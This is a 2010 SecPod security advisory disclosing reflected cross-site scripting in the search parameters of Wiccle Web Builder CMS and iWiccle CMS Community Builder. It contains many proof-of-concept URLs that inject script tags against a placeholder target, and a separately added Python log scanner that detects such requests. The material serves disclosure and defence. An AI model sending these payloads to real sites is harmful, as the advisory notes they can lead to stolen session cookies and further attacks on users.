SECURITYVULNS:DOC:24972
Oct 24, 2010

Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple XSS Vulnerabilities


##############################################################################
Wiccle Web Builder CMS and iWiccle CMS Community Builder
Multiple Cross-Site Scripting Vulnerability.

SecPod Technologies (www.secpod.com)
Author Veerendra G.G
###############################################################################

SecPod ID: 1005
09/07/2010 Issue Discovered

09/10/2010 Vendor Notified

09/13/2010 Vendor Confirmed

09/14/2010 Fix Available

Class: Cross-Site Scripting
Severity: Medium

Overview:

Wiccle Web Builder CMS and iWiccle CMS Community Builder are prone to
multiple cross-site scripting vulnerabilities.

Technical Description:

Wiccle Web Builder CMS and iWiccle CMS Community Builder are prone to
multiple cross-site scripting vulnerabilities because they fail to
properly sanitize user-supplied input.

NOTE: The vulnerability is exploitable when magic_quotes_gpc is Off
(magic_quotes_gpc = Off).

1) Input passed via the 'member_city' parameter to 'index.php', when
'module' is set to 'dating' and 'show' is set to 'member_search', is not
properly verified before it is returned to the user.

NOTE: This vulnerability exists only in Wiccle Web Builder CMS.

POC:
http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1

http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30

2) Input passed via the 'post_name', 'post_text', 'post_tag' and
'post_member_name' parameters to 'index.php', when 'module' is set to one
of various options (Auctions, Audio, etc.) and 'show' is set to
'post_search', is not properly verified before it is returned to the user.

NOTE: This vulnerability exists in both products (Wiccle Web Builder CMS
and iWiccle CMS Community Builder).

POC:
http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

3) Input passed via the 'member_username' and 'member_tags' parameters to
'index.php', when 'module' is set to 'members' and 'show' is set to
'member_search', is not properly verified before it is returned to the user.

NOTE: This vulnerability exists in both products (Wiccle Web Builder CMS
and iWiccle CMS Community Builder).

POC:
http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

These can be exploited to execute arbitrary HTML and script code in a
user's browser session in the context of a vulnerable site. This may allow
an attacker to steal cookie-based authentication credentials and launch
further attacks.

The exploit has been tested in Wiccle Web Builder CMS 2.0 (wwb_101.zip)
and iWiccle CMS Community Builder (iwiccle_1211.zip).
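
For sites still running the affected versions, one way to review web server logs for requests that put markup characters into the parameters listed above. This is an added example, not part of the SecPod advisory or the vendor's code; the function names, the combined access-log format and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters the advisory names as reflected, keyed by the 'show' value.
# 'post_tag' (advisory text) and 'post_tags' (PoC URLs) are both watched.
REFLECTED = {
    "member_search": {"member_city", "member_username", "member_tags"},
    "post_search": {"post_name", "post_text", "post_tag", "post_tags",
                    "post_member_name"},
}
# Characters that let a value break out of HTML text or an attribute.
MARKUP = re.compile(r"[<>\"']")
# Request line of a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return sorted names of advisory parameters carrying markup characters."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    show = (query.get("show") or [""])[0]
    hits = set()
    for name in REFLECTED.get(show, set()).intersection(query):
        # parse_qs decodes once; decode again to catch double encoding (%253C).
        if any(MARKUP.search(unquote(v)) for v in query[name]):
            hits.add(name)
    return sorted(hits)

def scan(log_lines):
    """Yield (line_number, path, params) for every flagged request."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            params = suspicious_params(match.group(1))
            if params:
                yield number, urlsplit(match.group(1)).path, params

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Oct/2010:10:00:01 +0000] "GET /wwb_101/index.php?module=dating&show=member_search&member_city=London HTTP/1.1" 200 5120',
    '192.0.2.11 - - [24/Oct/2010:10:00:02 +0000] "GET /wwb_101/index.php?module=dating&show=member_search&member_city=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5188',
    '192.0.2.12 - - [24/Oct/2010:10:00:03 +0000] "GET /iwiccle_1211/index.php?module=members&show=member_search&member_username=%253Cb%253E&member_tags=php HTTP/1.1" 200 4096',
    '192.0.2.13 - - [24/Oct/2010:10:00:04 +0000] "GET /wwb_101/index.php?module=news&show=post_list&post_text=%3Ci%3E HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Legitimate values containing an apostrophe will also be flagged, so treat hits as candidates for review rather than confirmed attacks.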

Impact:

Successful exploitation could allow an attacker to execute arbitrary HTML
and script code in a user's browser session in the context of a vulnerable
site.

Affected Software:

Wiccle Web Builder CMS 2.0 (wwb_101.zip)
iWiccle CMS Community Builder 2.0 (iwiccle_1211.zip)

References:

http://www.wiccle.com/
http://secpod.org/blog/?p=130
http://wiccle.com/download/wwb_101.zip
http://wiccle.com/download/iwiccle_1211.zip
http://secpod.org/advisories/SECPOD_Wiccle_Web_Builder_and_iWiccle_CMS_Community_Builder.txt
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas

Proof of Concepts:

NOTE: It is exploitable when magic_quotes_gpc is Off (magic_quotes_gpc = Off).

http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1

http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30

http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

Other POCs:

http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=store&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=downloads&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=guestbook&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=help&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=notebox&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=polls&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=portfolio&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=support&show=post_search&post_text=<script>alert('XSS-Test')</script>

Workaround:

Not available

Solution:

iWiccle CMS Community Builder 1.3.0 (iwiccle_130.zip)
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas

Risk Factor:

CVSS Score Report
    ACCESS_VECTOR          = NETWORK
    ACCESS_COMPLEXITY      = MEDIUM
    AUTHENTICATION         = NONE
    CONFIDENTIALITY_IMPACT = NONE
    INTEGRITY_IMPACT       = PARTIAL
    AVAILABILITY_IMPACT    = NONE
    EXPLOITABILITY         = PROOF_OF_CONCEPT
    REMEDIATION_LEVEL      = UNAVAILABLE
    REPORT_CONFIDENCE      = CONFIRMED
    CVSS Base Score        = 4.3 (MEDIUM)

(AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:

Veerendra G.G of SecPod Technologies has been credited with the discovery
of this vulnerability.